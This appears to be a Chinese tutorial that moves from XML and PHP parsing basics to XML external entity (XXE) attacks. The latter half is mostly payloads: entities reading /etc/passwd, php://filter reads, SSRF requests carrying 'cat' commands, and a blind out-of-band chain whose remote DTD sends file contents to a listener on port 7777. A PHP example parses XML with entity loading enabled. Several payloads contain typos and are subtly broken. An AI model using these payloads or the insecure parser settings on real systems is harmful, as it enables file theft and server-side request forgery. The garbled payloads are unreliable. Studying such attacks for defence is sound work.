最好的网站建设公司seo综合诊断工具
XML语言基础
XML的标签对大小写敏感。
XML必须正确的嵌套。
<root><hero><name>妲己</name>第0个节点<jineng>爱心</jineng></hero><hero><name>亚瑟</name>第二个节点<jineng>旋转</jineng></hero> </root>
在文件中用到大于号和小于号,使用CDATA[]包裹起来即可,包裹之中的大于号和小于号就不会被当作功能性符号执行。
使用PHP执行XML文件
<root><man><name>程咬金</name><age>2000</age></man><man><name>赵云</name><age>1700</age></man> </root>
simplexml_load_file()函数
<?php
$xml = simplexml_load_file('3.xml');
echo $xml->man[0]->name;
?>
domdocument()函数
<?php
$xml = new domdocument();//实例化
$xml->load('3.xml');//加载文件
print_r($xml->saveXML());
?>
<?php
$xml = new domdocument();//实例化
$xml->load('3.xml');//加载文件
$age = $xml->getElementsByTagName('age')->item(1)->nodeValue;//读取对应的内容
$name = $xml->getElementsByTagName('name')->item(0)->nodeValue;
echo $age;
echo $name;
?>
混合使用
<?php
$xmlfile = file_get_contents('3.xml');
$xmlDoc = new DOMDocument();
$xmlDoc ->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($xmlDoc);
$name = $creds->man[1]->name;
print $name;
?>
内部的DOCTYPE声明
使用DOCTYPE标签,对xml文件起约束作用。
内部声明:
<!DOCTYPE root[<!ELEMENT root (man)>//root中只能是man<!ELEMENT man (name,age)>//man中只能有name和age<!ELEMENT name (#PCDATA)><!ELEMENT age (#PCDATA)>]>
外部声明:
在之后构造payload时不要有回车,不要换行。 <!DOCTYPE [//外部声明<!ENTITY ben SYSTEM "file:///etc/passwd"> ]
实体
普通实体
<!DOCTYPE root[<!ENTITY ben "dazhuang"><!ENTITY lao6 SYSTEM "http://www.baidu.com/robots.txt">]> <root><man><name>wo shi &ben;</name></man> </root> 调用的时候使用&+ben+;
参数实体
参数实体使用%,而不是&。 <!DOCTYPE root[<!ENTITY % ben "dazhuang"><!ENTITY % lao6 SYSTEM "http://192.168.1.151/1.dtd">//1.dtd里面参数san%lao6//调用参数实体]> <root><man><name>wo shi &san;</name></man> </root>
XXE常见利用手法
file被过滤
有回显
使用参数,去别的文件获取到恶意代码。
不同的方法:
1、利用参数实体检索文件
2、利用XXE命名实体及外部实体读取文件
1.dtd文件 <!ENTITY ben SYSTEM "file:///etc/passwd">
传参 <!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://192.168.1.151/1.dtd"> %xxe;]>
这样就可以获取到网站的一些文件。
3、利用XXE进行SSRF漏洞利用
<!doctype root [<!ENTITY xxe SYSTEM "http://192.168.1.6:18091/?cmd=cat /etc/passwd"]>
4、使用XXE利用php伪协议读取文件
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convet.base64-encode/nesource=/etc/passwd">]>
5、php伪协议配合SSRF
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convet.base64-encode/nesource=http://192.168.1.6:18091/?cmd=cat index.php">]>
无回显
1、a,参数实体,读取/etc/passwd
2、b,普通实体,http://kali_ip/%a;
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://filter/read=convert.base64-encode/resource=/etc/passwd"><!ENTITY req SYSTEM "http://192.168.1.151/%xxe;">]> 因为普通实体里面不能调用参数实体,所以需要构造。
1.dtd文件 <!ENTITY % file SYSTEM "php://filter/read=convert.base-encode/resource=file:///etc/passwd"><!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.1.151:7777?p=%file;'>">
<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://192.168.1.151/1.dtd">%remote;%int;%send;]> 参数实体会触发调用1.dtd的内容。 7就是指%
打开http公网的服务,监听7777端口,再进行访问,即可查看内容。